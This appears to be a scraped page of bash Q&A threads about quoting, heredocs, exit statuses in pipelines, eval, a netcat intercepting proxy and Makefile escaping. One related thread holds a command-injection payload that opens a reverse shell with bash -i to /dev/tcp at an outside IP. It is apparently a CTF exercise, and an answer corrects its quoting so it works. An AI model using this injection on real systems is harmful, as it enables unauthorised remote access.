Can anybody show me how to escape a shell command in bash script written by another bash script ?
For example my script looks like:
sudo sh -c "echo \"if who | grep tty | grep \`whoami\` > /dev/null\" > test.sh"
sudo sh -c "echo \"then\" >> test.sh"
sudo sh -c "echo \" echo ' log in '\" >> test.sh"
sudo sh -c "echo \"else\" >> test.sh"
sudo sh -c "echo \" exit\" >> test.sh"
sudo sh -c "echo \"fi\" >> test.sh"
I want that the script test.sh contains
if who | grep tty | grep `whoami`> /dev/null
then
echo 'user is log in '
else
exit
fi
Actually the command whoami is replaced by root.
Solution:
sudo tee /usr/local/bin/test.sh << 'EOF'
if who | grep tty | grep `whoami`> /dev/null
then
echo 'user is log in '
else
exit
fi
EOF
Complex quotes are most easily handled with a heredoc:
cat > test.sh << 'EOF'
if who | grep tty | grep `whoami`> /dev/null
then
echo 'user is log in '
else
exit
fi
EOF
Related
When attempting to create a reverse shell with the following code injection, I receive the error: bash: 1': ambiguous redirect:
echo “ ; /bin/bash -c ‘bash -i >& /dev/tcp/10.10.17.216/1234 0>&1’ #” >> hackers
The code to be executed is directed to the hackers file which, in turn, is called by this script:
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
Try to add \" at the start and the end :
echo “\" ; /bin/bash -c ‘bash -i >& /dev/tcp/10.10.17.216/1234 0>&1’ #\"” >> hackers
This worked for me :
echo "\" HRI ; /bin/bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1' \"" >> hackers
There are a few layers here, so bear with me.
My docker-container ssh -c"echo 'YAY!'; exit 25;" command executes echo 'YAY!'; exit 25; in my docker container. It returns:
YAY
error: message=YAY!
, code=25
I need to know if the command within the container was successful, so I append the following to the command:
docker-container ssh -c"echo 'YAY!'; exit 25;" >&1 2>/tmp/stderr; cat /tmp/stderr | grep 'code=' | cut -d'=' -f2 | { read exitStatus; echo $exitStatus; }
This sends the stderr to /tmp/stderr and, with the echo $exitStatus returns:
YAY!
25
So, this is exactly what I want. I want the $exitStatus saved to a variable. My problem is, I am placing this into a bash script (GIT pre-commit) and when this exact code is executed, the exit status is null.
Here is my bash script:
# .git/hooks/pre-commit
if [ -z ${DOCKER_MOUNT+x} ];
then
docker-container ssh -c"echo 'YAY!'; exit 25;" >&1 2>/tmp/stderr; cat /tmp/stderr | grep 'code=' | cut -d'=' -f2 | { read exitStatus; echo $exitStatus; }
exit $exitStatus;
else
echo "Container detected!"
fi;
That's because you're setting the variable in a pipeline. Each command in the pipeline is run in a subshell, and when the subshell exits the variable are no longer available.
bash allows you to run the pipeline's last command in the current shell, but you also have to turn off job control
An example
# default bash
$ echo foo | { read x; echo x=$x; } ; echo x=$x
x=foo
x=
# with "lastpipe" configuration
$ set +m; shopt -s lastpipe
$ echo foo | { read x; echo x=$x; } ; echo x=$x
x=foo
x=foo
Add set +m; shopt -s lastpipe to your script and you should be good.
And as Charles comments, there are more efficient ways to do it. Like this:
source <(docker-container ssh -c "echo 'YAY!'; exit 25;" 2>&1 1>/dev/null | awk -F= '/code=/ {print "exitStatus=" $2}')
echo $exitStatus
I'd like to get exit status of the command passed as argument (to my sh script called a.sh).
I've tried:
#!/bin/sh
CMD="$#"
echo "arg passed CMD: $CMD"
($CMD) >/dev/null 2>&1
res=$?
echo "exit status: $res"
CMD="echo aaa | grep -q zzz"
echo "in script CMD: $CMD"
($CMD) >/dev/null 2>&1
res=$?
echo "exit status: $res"
Once executing:
./a.sh 'echo aa | grep -q zzz'
arg passed CMD: echo aa | grep -q zzz
exit status: 0
in script CMD: echo aaa | grep -q zzz
exit status: 0
However if I run the command directly in shell I see:
/bin/sh -c 'echo aa | grep -q zzz ; echo $?'
1
How should my script look like, to get the correct status 1 instead of 0 of the executed command?
$(CMD) output were aaa | grep -q zzz that is why it return with exit 0. Just remove the redirection to /dev/null and you will see.
You could use eval to run commands from variables.
#!/bin/sh
CMD="$#"
echo "arg passed CMD: $CMD"
eval $CMD >/dev/null 2>&1
res=$?
echo "exit status: $res"
CMD="echo aaa | grep -q zzz"
echo "in script CMD: $CMD"
eval $CMD >/dev/null 2>&1
res=$?
echo "exit status: $res"
Looking for an intercepting proxy made with netcat I found this script:
#!/bin/sh -e
if [ $# != 3 ]
then
echo "usage: $0 <src-port> <dst-host> <dst-port>"
exit 0
fi
TMP=`mktemp -d`
BACK=$TMP/pipe.back
SENT=$TMP/pipe.sent
RCVD=$TMP/pipe.rcvd
trap 'rm -rf "$TMP"' EXIT
mkfifo -m 0600 "$BACK" "$SENT" "$RCVD"
sed 's/^/ => /' <"$SENT" &
sed 's/^/<= /' <"$RCVD" &
nc -l -p "$1" <"$BACK" | tee "$SENT" | nc "$2" "$3" | tee "$RCVD" >"$BACK"
Which work nicely, as expected.
Since I need to look closely to the encoding used, hence the actual bytes passing, I tried to change some lines to use hexdump -vC:
#!/bin/sh -e
if [ $# != 3 ]
then
echo "usage: $0 <src-port> <dst-host> <dst-port>"
exit 0
fi
TMP=`mktemp -d`
BACK=$TMP/pipe.back
SENT=$TMP/pipe.sent
RCVD=$TMP/pipe.rcvd
trap 'rm -rf "$TMP"' EXIT
mkfifo -m 0600 "$BACK" "$SENT" "$RCVD"
( hexdump -vC | sed 's/^/ => /' ) <"$SENT" &
( hexdump -vC | sed 's/^/<= /' ) <"$RCVD" &
nc -l -p "$1" <"$BACK" | tee "$SENT" | nc "$2" "$3" | tee "$RCVD" >"$BACK"
Now it's not working anymore. Actually, I've lost the "realtime" feature of the previous script. Every byte sent is dumped in a single batch; then every byte received in another batch; and this all only after the connection is closed.
I'm suspecting some sort of buffering occurs in the pipe (|), but I'm not sure how to:
test this hypotesis;
fix the script to make it work in realtime again.
PS1. I'm using cygwin.
PS2. sh --version outputs:
GNU bash, version 4.1.10(4)-release (i686-pc-cygwin)
Edit:
Removind the | sed ... part (that is, leaving only hexdump -vC <"$SENT" and hexdump -vC <"$RCVD") the realtime feature is back, increasing my suspicion over the pipeline operator. But the output turns out to be confusing since sent and received bytes are mixed.
Still I couldn't manage to resolve the buffering (?) issue, but I could change the hexdump invocation to render the sed unnecessary:
#!/bin/sh -e
if [ $# != 3 ]
then
echo "usage: $0 <src-port> <dst-host> <dst-port>"
exit 0
fi
TMP=`mktemp -d`
BACK=$TMP/pipe.back
SENT=$TMP/pipe.sent
RCVD=$TMP/pipe.rcvd
trap 'rm -rf "$TMP"' EXIT
mkfifo -m 0600 "$BACK" "$SENT" "$RCVD"
hexdump -v -e '" => %08.8_Ax\n"' -e '" => %08.8_ax " 8/1 "%02x " " " 8/1 "%02x "' -e '" |" 16/1 "%_p" "|\n"' <"$SENT" &
hexdump -v -e '"<= %08.8_Ax\n"' -e '"<= %08.8_ax " 8/1 "%02x " " " 8/1 "%02x "' -e '" |" 16/1 "%_p" "|\n"' <"$RCVD" &
nc -l "$1" <"$BACK" | tee "$SENT" | nc "$2" "$3" | tee "$RCVD" >"$BACK"
Yes, the new hexdump looks ugly, but works.
This question for me is now open just for the sake of curiosity. I'm still willing to give the "correct answer" points to the one who explains (and fixes) the buffering (?) behavior.
I have the following code in a Makefile:
NODES = celery1 celery2 celery3 priority export
get-status = /bin/bash -c "ps -p `/bin/bash -c '[ -a log/$(1).pid ] && cat log/$(1).pid || echo 1'` -o command= | grep $(1) > /dev/null && echo \"[$(1)] Appears to be running\" || eval 'echo \"[$(1)] Not running\" && exit 1'"
celery-status:
for n in ${NODES}; do $(call get-status,$$n); done
I can't manage to make it work. And when I do:
get-status = /bin/bash -c "ps -p `/bin/bash -c '[ -a log/$(1).pid ] && cat log/$(1).pid || echo $(1)'` -o command= | grep $(1) > /dev/null && echo \"[$(1)] Appears to be running\" || eval 'echo \"[$(1)] Not running\" && exit 1'" 1 displaying the argument instead of 1
celery-status:
for n in ${NODES}; do echo $(call get-status,$$n); done # echo the statements
Here is the output:
/bin/bash -c ps -p -o command= | grep celery1 > /dev/null && echo "[celery1] Appears to be running" || eval 'echo "[celery1] Not running" && exit 1'
/bin/bash -c ps -p -o command= | grep celery2 > /dev/null && echo "[celery2] Appears to be running" || eval 'echo "[celery2] Not running" && exit 1'
/bin/bash -c ps -p -o command= | grep celery3 > /dev/null && echo "[celery3] Appears to be running" || eval 'echo "[celery3] Not running" && exit 1'
/bin/bash -c ps -p -o command= | grep priority > /dev/null && echo "[priority] Appears to be running" || eval 'echo "[priority] Not running" && exit 1'
/bin/bash -c ps -p -o command= | grep export > /dev/null && echo "[export] Appears to be running" || eval 'echo "[export] Not running" && exit 1'
It looks like the $(1) does not work, maybe I'm not escaping correctly.
I'm a bit desperate here :/